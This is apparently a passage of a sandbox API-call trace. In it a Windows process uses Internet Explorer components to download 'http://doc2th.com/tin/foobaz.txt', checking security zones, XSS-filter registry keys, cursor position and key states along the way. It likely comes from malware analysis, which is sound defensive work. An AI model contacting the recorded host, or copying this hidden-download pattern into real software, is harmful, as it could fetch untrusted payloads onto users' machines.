[0026.673] IUnknown:AddRef (This=0x11ae64) returned 0x9 [0026.673] IUri:GetAbsoluteUri (in: This=0x11ae64, pbstrAbsoluteUri=0x120bd0 | out: pbstrAbsoluteUri=0x120bd0*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.673] IUnknown:Release (This=0x11ae64) returned 0x8 [0026.673] IUnknown:AddRef (This=0x12e480) returned 0x2 [0026.673] IUnknown:Release (This=0x12e480) returned 0x1 [0026.673] IUnknown:AddRef (This=0xff600) returned 0x3 [0026.673] IUnknown:Release (This=0x12e480) returned 0x0 [0026.673] IUnknown:AddRef (This=0xff600) returned 0x4 [0026.673] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f4bc | out: ppvObject=0x40f4bc*=0x11ae64) returned 0x0 [0026.673] IUnknown:Release (This=0x11ae64) returned 0x6 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0x7 [0026.673] IUnknown:QueryInterface (in: This=0xff600, riid=0x632872f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x40f490 | out: ppvObject=0x40f490*=0xff60c) returned 0x0 [0026.673] IUriContainer:GetIUri (in: This=0xff60c, ppIUri=0x40f4e4 | out: ppIUri=0x40f4e4*=0x11ae64) returned 0x0 [0026.673] IUnknown:Release (This=0xff60c) returned 0x4 [0026.673] IUnknown:AddRef (This=0xff600) returned 0x5 [0026.673] IUnknown:Release (This=0xff600) returned 0x4 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0x9 [0026.673] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f4bc | out: ppvObject=0x40f4bc*=0x11ae64) returned 0x0 [0026.673] IUnknown:Release (This=0x11ae64) returned 0x9 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0xa [0026.673] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f4b4 | out: pdwScheme=0x40f4b4*=0x2) returned 0x0 [0026.673] GetCurrentProcessId () returned 0xa18 [0026.673] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f4bc | out: ppvObject=0x40f4bc*=0x11ae64) returned 0x0 [0026.674] IUnknown:Release (This=0x11ae64) returned 0xa [0026.674] IUnknown:AddRef (This=0x11ae64) returned 0xb [0026.674] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f48c | out: pdwScheme=0x40f48c*=0x2) returned 0x0 [0026.674] IUri:GetAbsoluteUri (in: This=0x11ae64, pbstrAbsoluteUri=0x40f4bc | out: pbstrAbsoluteUri=0x40f4bc*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.674] GetProcAddress (hModule=0x75580000, lpProcName=0x7) returned 0x75584680 [0026.674] SysStringLen (param_1="http://doc2th.com/tin/foobaz.txt") returned 0x20 [0026.674] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x40f4d8 | out: ppURI=0x40f4d8*=0x11ae64) returned 0x0 [0026.674] IUnknown:Release (This=0x11ae64) returned 0xb [0026.674] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f46c | out: pdwScheme=0x40f46c*=0x2) returned 0x0 [0026.674] IUnknown:AddRef (This=0x11ae64) returned 0xc [0026.674] IUri:GetPropertyDWORD (in: This=0x11ae64, uriProp=0x11, pdwProperty=0x40f24c, dwFlags=0x0 | out: pdwProperty=0x40f24c*=0x2) returned 0x0 [0026.674] IInternetSecurityManager:GetSecurityId (in: This=0x122f88, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f2b0, pcbSecurityId=0x40f2ac*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f2b0*=0x68, pcbSecurityId=0x40f2ac*=0x13) returned 0x0 [0026.674] IInternetSecurityManager:GetSecurityId (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f2b0, pcbSecurityId=0x40f2ac*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f2b0*=0x0, pcbSecurityId=0x40f2ac*=0x200) returned 0x800c0011 [0027.306] IUnknown:Release (This=0x11ae64) returned 0xb [0027.306] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f468 | out: ppu=0x40f468) returned 0x0 [0027.306] GetDC (hWnd=0x0) returned 0xb0108b5 [0027.307] CreateCompatibleBitmap (hdc=0xb0108b5, cx=1, cy=1) returned 0x230507a4 [0027.307] GetDIBits (in: hdc=0xb0108b5, hbm=0x230507a4, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x40f038, usage=0x0 | out: lpvBits=0x0, lpbmi=0x40f038) returned 1 [0027.307] GetDIBits (in: hdc=0xb0108b5, hbm=0x230507a4, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x40f038, usage=0x0 | out: lpvBits=0x0, lpbmi=0x40f038) returned 1 [0027.307] DeleteObject (ho=0x230507a4) returned 1 [0027.307] GetSysColor (nIndex=0) returned 0xc8c8c8 [0027.307] GetSysColor (nIndex=1) returned 0x0 [0027.307] GetSysColor (nIndex=2) returned 0xd1b499 [0027.307] GetSysColor (nIndex=3) returned 0xdbcdbf [0027.307] GetSysColor (nIndex=4) returned 0xf0f0f0 [0027.307] GetSysColor (nIndex=5) returned 0xffffff [0027.307] GetSysColor (nIndex=6) returned 0x646464 [0027.307] GetSysColor (nIndex=7) returned 0x0 [0027.307] GetSysColor (nIndex=8) returned 0x0 [0027.307] GetSysColor (nIndex=9) returned 0x0 [0027.307] GetSysColor (nIndex=10) returned 0xb4b4b4 [0027.307] GetSysColor (nIndex=11) returned 0xfcf7f4 [0027.307] GetSysColor (nIndex=12) returned 0xababab [0027.307] GetSysColor (nIndex=13) returned 0xff9933 [0027.307] GetSysColor (nIndex=14) returned 0xffffff [0027.307] GetSysColor (nIndex=15) returned 0xf0f0f0 [0027.307] GetSysColor (nIndex=16) returned 0xa0a0a0 [0027.307] GetSysColor (nIndex=17) returned 0x6d6d6d [0027.307] GetSysColor (nIndex=18) returned 0x0 [0027.307] GetSysColor (nIndex=19) returned 0x544e43 [0027.307] GetSysColor (nIndex=20) returned 0xffffff [0027.307] GetSysColor (nIndex=21) returned 0x696969 [0027.307] GetSysColor (nIndex=22) returned 0xe3e3e3 [0027.307] GetSysColor (nIndex=23) returned 0x0 [0027.307] GetSysColor (nIndex=24) returned 0xe1ffff [0027.307] GetSysColor (nIndex=25) returned 0x0 [0027.307] GetSysColor (nIndex=26) returned 0xcc6600 [0027.307] GetSysColor (nIndex=27) returned 0xead1b9 [0027.307] GetSysColor (nIndex=28) returned 0xf2e4d7 [0027.307] GetSysColor (nIndex=29) returned 0xff9933 [0027.307] GetSysColor (nIndex=30) returned 0xf0f0f0 [0027.307] GetSysColor (nIndex=31) returned 0x0 [0027.307] GetSysColor (nIndex=32) returned 0x0 [0027.307] GetSysColor (nIndex=33) returned 0x0 [0027.307] GetSysColor (nIndex=34) returned 0x0 [0027.307] GetSysColor (nIndex=35) returned 0x0 [0027.307] GetSysColor (nIndex=36) returned 0x0 [0027.307] GetSysColor (nIndex=37) returned 0x0 [0027.307] GetSysColor (nIndex=38) returned 0x0 [0027.307] GetSysColor (nIndex=39) returned 0x0 [0027.307] GetSysColor (nIndex=40) returned 0x0 [0027.307] GetSysColor (nIndex=41) returned 0x0 [0027.307] GetSysColor (nIndex=42) returned 0x0 [0027.307] GetSysColor (nIndex=43) returned 0x0 [0027.307] GetSysColor (nIndex=44) returned 0x0 [0027.307] GetSysColor (nIndex=45) returned 0x0 [0027.307] GetSysColor (nIndex=46) returned 0x0 [0027.307] GetSysColor (nIndex=47) returned 0x0 [0027.307] GetSysColor (nIndex=48) returned 0x0 [0027.307] GetSysColor (nIndex=49) returned 0x0 [0027.308] GetSysColor (nIndex=50) returned 0x0 [0027.308] GetSysColor (nIndex=51) returned 0x0 [0027.308] GetSysColor (nIndex=52) returned 0x0 [0027.308] GetSysColor (nIndex=53) returned 0x0 [0027.308] GetSysColor (nIndex=54) returned 0x0 [0027.308] GetSysColor (nIndex=55) returned 0x0 [0027.308] GetSysColor (nIndex=56) returned 0x0 [0027.308] GetSysColor (nIndex=57) returned 0x0 [0027.308] GetSysColor (nIndex=58) returned 0x0 [0027.308] GetSysColor (nIndex=59) returned 0x0 [0027.308] GetSysColor (nIndex=60) returned 0x0 [0027.308] GetSysColor (nIndex=61) returned 0x0 [0027.308] GetSysColor (nIndex=62) returned 0x0 [0027.308] GetSysColor (nIndex=63) returned 0x0 [0027.308] GetDeviceCaps (hdc=0xb0108b5, index=38) returned 32409 [0027.308] ReleaseDC (hWnd=0x0, hDC=0xb0108b5) returned 1 [0027.308] GetCurrentThreadId () returned 0xa1c [0027.308] GetCursorPos (in: lpPoint=0x40f2b8 | out: lpPoint=0x40f2b8*(x=1248, y=501)) returned 1 [0027.308] GetKeyState (nVirtKey=16) returned 0 [0027.308] GetKeyState (nVirtKey=17) returned 0 [0027.308] GetKeyState (nVirtKey=18) returned 0 [0027.308] GetKeyState (nVirtKey=160) returned 0 [0027.308] GetKeyState (nVirtKey=162) returned 0 [0027.308] GetKeyState (nVirtKey=164) returned 0 [0027.309] GetProcAddress (hModule=0x75580000, lpProcName=0x8) returned 0x75583ed5 [0027.309] GetCurrentThreadId () returned 0xa1c [0027.309] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f458 | out: ppu=0x40f458) returned 0x0 [0027.309] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40f43c | out: ppURI=0x40f43c*=0x11ae64) returned 0x0 [0027.309] IUnknown:AddRef (This=0x11ae64) returned 0xd [0027.309] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f3dc, dwFlags=0x0 | out: pdwZone=0x40f3dc*=0xffffffff) returned 0x800c0011 [0027.309] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0027.309] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0027.309] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0027.309] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x2700, pPolicy=0x40f3e0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x40f3e0*=0x0) returned 0x0 [0027.309] IUnknown:Release (This=0x11ae64) returned 0xc [0027.309] IUnknown:Release (This=0x11ae64) returned 0xb [0027.309] IUnknown:AddRef (This=0x11ae64) returned 0xc [0027.309] IUri:GetPropertyDWORD (in: This=0x11ae64, uriProp=0x11, pdwProperty=0x40f214, dwFlags=0x0 | out: pdwProperty=0x40f214*=0x2) returned 0x0 [0027.309] IInternetSecurityManager:GetSecurityId (in: This=0x122f88, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f270, pcbSecurityId=0x40f26c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f270*=0x68, pcbSecurityId=0x40f26c*=0x13) returned 0x0 [0027.309] IInternetSecurityManager:GetSecurityId (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f270, pcbSecurityId=0x40f26c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f270*=0x0, pcbSecurityId=0x40f26c*=0x200) returned 0x800c0011 [0027.309] IUnknown:Release (This=0x11ae64) returned 0xb [0027.309] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x40f494, dwReserved=0x0 | out: ppIInternetSession=0x40f494*=0x124868) returned 0x0 [0027.309] IInternetSession:RegisterNameSpace (This=0x124868, pCF=0x63688c50, rclsid=0x63289790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0027.310] IUnknown:AddRef (This=0x63688c50) returned 0x1 [0027.310] IInternetSession:RegisterNameSpace (This=0x124868, pCF=0x63688c70, rclsid=0x63289780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0027.310] IUnknown:AddRef (This=0x63688c70) returned 0x1 [0027.310] StrCmpICW (pszStr1="http://doc2th.com/tin/foobaz.txt", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10 [0027.310] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f404 | out: ppvObject=0x40f404*=0x11ae64) returned 0x0 [0027.310] IUnknown:Release (This=0x11ae64) returned 0xb [0027.310] IUnknown:AddRef (This=0x11ae64) returned 0xc [0027.310] IUnknown:AddRef (This=0x11ae64) returned 0xd [0027.310] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f3c8 | out: ppvObject=0x40f3c8*=0x11ae64) returned 0x0 [0027.311] IUnknown:Release (This=0x11ae64) returned 0xd [0027.311] IUnknown:AddRef (This=0x11ae64) returned 0xe [0027.311] IUnknown:Release (This=0x11ae64) returned 0xd [0027.311] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f44c | out: pdwScheme=0x40f44c*=0x2) returned 0x0 [0027.311] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0027.311] IUnknown:AddRef (This=0x11ae64) returned 0xe [0027.311] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f3e8 | out: ppvObject=0x40f3e8*=0x11ae64) returned 0x0 [0027.311] IUnknown:Release (This=0x11ae64) returned 0xe [0027.311] IUnknown:AddRef (This=0x11ae64) returned 0xf [0027.311] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f0ec | out: ppvObject=0x40f0ec*=0x11ae64) returned 0x0 [0027.312] IUnknown:Release (This=0x11ae64) returned 0xf [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x10 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x11 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x12 [0027.312] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f0e0 | out: ppvObject=0x40f0e0*=0x11ae64) returned 0x0 [0027.312] IUnknown:Release (This=0x11ae64) returned 0x12 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0027.312] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x14b338 | out: pdwScheme=0x14b338*=0x2) returned 0x0 [0027.312] IMoniker:IsSystemMoniker (in: This=0xff600, pdwMksys=0x40f148 | out: pdwMksys=0x40f148*=0x6) returned 0x0 [0027.312] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f0ec | out: ppvObject=0x40f0ec*=0x11ae64) returned 0x0 [0027.312] IUnknown:Release (This=0x11ae64) returned 0x13 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x14 [0027.313] IInternetSession:CreateBinding (in: This=0x124868, pbc=0x0, szUrl="http://doc2th.com/tin/foobaz.txt", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x141488, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x141488*=0x14b3e8) returned 0x0 [0027.313] IUnknown:QueryInterface (in: This=0x14b3e8, riid=0x632a6078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x40f070 | out: ppvObject=0x40f070*=0x0) returned 0x80004002 [0027.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f00c | out: phkResult=0x40f00c*=0x370) returned 0x0 [0027.313] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f010 | out: phkResult=0x40f010*=0x36c) returned 0x0 [0027.313] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x40efcc | out: phkResult=0x40efcc*=0x0) returned 0x2 [0027.313] RegOpenKeyExW (in: hKey=0x370, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x40efcc | out: phkResult=0x40efcc*=0x374) returned 0x0 [0027.313] SHRegGetValueW () returned 0x2 [0027.314] SHRegGetValueW () returned 0x2 [0027.314] RegCloseKey (hKey=0x374) returned 0x0 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x370) returned 0x0 [0027.314] RegCloseKey (hKey=0x36c) returned 0x0 [0027.314] IUnknown:AddRef (This=0x14b3e8) returned 0x2 [0027.314] IUnknown:QueryInterface (in: This=0x14b3e8, riid=0x632a6158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x40f0b4 | out: ppvObject=0x40f0b4*=0x14b3e8) returned 0x0 [0027.314] IInternetProtocolEx:StartEx (This=0x14b3e8, pUri=0x11ae64, pOIProtSink=0x14b284, pOIBindInfo=0x14b24c, grfPI=0x10, dwReserved=0x0) returned 0x0 [0027.314] IUnknown:AddRef (This=0x14b284) returned 0x3 [0027.314] IUnknown:AddRef (This=0x14b24c) returned 0x4 [0027.314] IUnknown:QueryInterface (in: This=0x14b24c, riid=0x764a6f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x40f05c | out: ppvObject=0x40f05c*=0x0) returned 0x80004002 [0027.314] IInternetBindInfo:GetBindInfo (in: This=0x14b24c, grfBINDF=0x14b558, pbindinfo=0x14b560 | out: grfBINDF=0x14b558*=0x20083, pbindinfo=0x14b560) returned 0x0 [0027.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40efb8 | out: phkResult=0x40efb8*=0x36c) returned 0x0 [0027.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40efbc | out: phkResult=0x40efbc*=0x370) returned 0x0 [0027.314] RegOpenKeyExW (in: hKey=0x370, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x40ef78 | out: phkResult=0x40ef78*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x40ef78 | out: phkResult=0x40ef78*=0x0) returned 0x2 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x36c) returned 0x0 [0027.314] RegCloseKey (hKey=0x370) returned 0x0 [0027.314] IUnknown:AddRef (This=0x14b284) returned 0x5 [0027.375] IInternetBindInfo:GetBindString (in: This=0x14b24c, ulStringType=0x2, ppwzStr=0x40e810, cEl=0x100, pcElFetched=0x40f018*=0x100 | out: ppwzStr=0x40e810*="*/*", pcElFetched=0x40f018*=0x1) returned 0x0 [0027.375] CoTaskMemAlloc (cb=0x8) returned 0x13ffe0 [0027.375] IUnknown:QueryInterface (in: This=0x14b284, riid=0x764b97c8*(Data1=0x58dfc7d0, Data2=0x5381, Data3=0x43e5, Data4=([0]=0x9d, [1]=0x72, [2]=0x4c, [3]=0xdd, [4]=0xe4, [5]=0xcb, [6]=0xf, [7]=0x1a)), ppvObject=0x40f018 | out: ppvObject=0x40f018*=0x0) returned 0x80004002 [0027.376] IUnknown:QueryInterface (in: This=0x14b284, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14b4b0 | out: ppvObject=0x14b4b0*=0x14b244) returned 0x0 [0027.376] IServiceProvider:QueryService (in: This=0x14b244, guidService=0x764a6b20*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x764a6b20*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14b644 | out: ppvObject=0x14b644*=0x14b248) returned 0x0 [0027.376] IHttpNegotiate:BeginningTransaction (in: This=0x14b248, szUrl="http://doc2th.com/tin/foobaz.txt", szHeaders="Accept-Encoding: gzip, deflate", dwReserved=0x0, pszAdditionalHeaders=0x40e7cc | out: pszAdditionalHeaders=0x40e7cc*="Accept-Language: en-US\r\n") returned 0x0 [0027.376] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40e790 | out: ppURI=0x40e790*=0x11ae64) returned 0x0 [0027.376] IUnknown:AddRef (This=0x11ae64) returned 0x19 [0027.376] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40e6e8 | out: ppvObject=0x40e6e8*=0x11ae64) returned 0x0 [0027.376] IUnknown:Release (This=0x11ae64) returned 0x19 [0027.376] IUnknown:AddRef (This=0x11ae64) returned 0x1a [0027.377] CoTaskMemAlloc (cb=0x32) returned 0x12e880 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x19 [0027.377] IServiceProvider:QueryService (in: This=0x14b244, guidService=0x764a6b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x764a6b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x14b668 | out: ppvObject=0x14b668*=0x14b248) returned 0x0 [0027.377] IHttpNegotiate2:GetRootSecurityId (in: This=0x14b248, pbSecurityId=0x40e5cc, pcbSecurityId=0x14b634*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40e5cc*=0xe7, pcbSecurityId=0x14b634*=0x200) returned 0x80004005 [0027.377] IUnknown:Release (This=0x14b3e8) returned 0x4 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x17 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x16 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x15 [0027.377] CoTaskMemFree (pv=0x0) [0027.377] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f3a0 | out: lpCPInfo=0x40f3a0) returned 1 [0027.377] IUnknown:AddRef (This=0x124868) returned 0x3 [0027.378] IUnknown:AddRef (This=0x11ae64) returned 0x16 [0027.378] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f3a8 | out: ppvObject=0x40f3a8*=0x11ae64) returned 0x0 [0027.378] IUnknown:Release (This=0x11ae64) returned 0x16 [0027.378] IUnknown:AddRef (This=0x11ae64) returned 0x17 [0027.378] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f3ac | out: pdwScheme=0x40f3ac*=0x2) returned 0x0 [0027.378] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1bc [0027.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6327e718, lpParameter=0x131d48, dwCreationFlags=0x0, lpThreadId=0x131d5c | out: lpThreadId=0x131d5c*=0xa38) returned 0x3b8 [0027.378] GetCurrentThreadId () returned 0xa1c [0027.378] IUnknown:Release (This=0x11ae64) returned 0x16 [0027.378] IUnknown:Release (This=0x11ae64) returned 0x15 [0027.378] IUnknown:Release (This=0xff600) returned 0x3 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x14 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x13 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x12 [0027.379] IUnknown:Release (This=0xff600) returned 0x2 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x11 [0027.379] CoTaskMemFree (pv=0x1083a8) [0027.379] CoTaskMemFree (pv=0x0) [0027.379] IUnknown:Release (This=0x11ae64) returned 0x10 [0027.379] CoTaskMemFree (pv=0x108358) [0027.379] GetClientRect (in: hWnd=0x10200, lpRect=0x40f8c4 | out: lpRect=0x40f8c4) returned 1 [0027.380] GetClientRect (in: hWnd=0x10200, lpRect=0x10204c | out: lpRect=0x10204c) returned 1 [0027.380] OffsetRect (in: lprc=0x10204c, dx=0, dy=0 | out: lprc=0x10204c) returned 1 [0027.380] OffsetRect (in: lprc=0x10205c, dx=0, dy=0 | out: lprc=0x10205c) returned 1 [0027.380] RegisterClassExW (param_1=0x40f3e0) returned 0xc19d [0027.380] CoCreateInstance (in: rclsid=0x6329bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x6329bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x6368b020 | out: ppv=0x6368b020*=0x150ec8) returned 0x0 [0027.466] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x150ec8, aaClassList=0x40f4d8*=0xc19d, uSize=0x1) returned 0x0 [0027.466] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc19d, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x10200, hMenu=0x0, hInstance=0x63150000, lpParam=0x121030) returned 0x10204 [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-20) returned 0 [0027.467] SetWindowLongW (hWnd=0x10204, nIndex=-21, dwNewLong=1183792) returned 0 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: 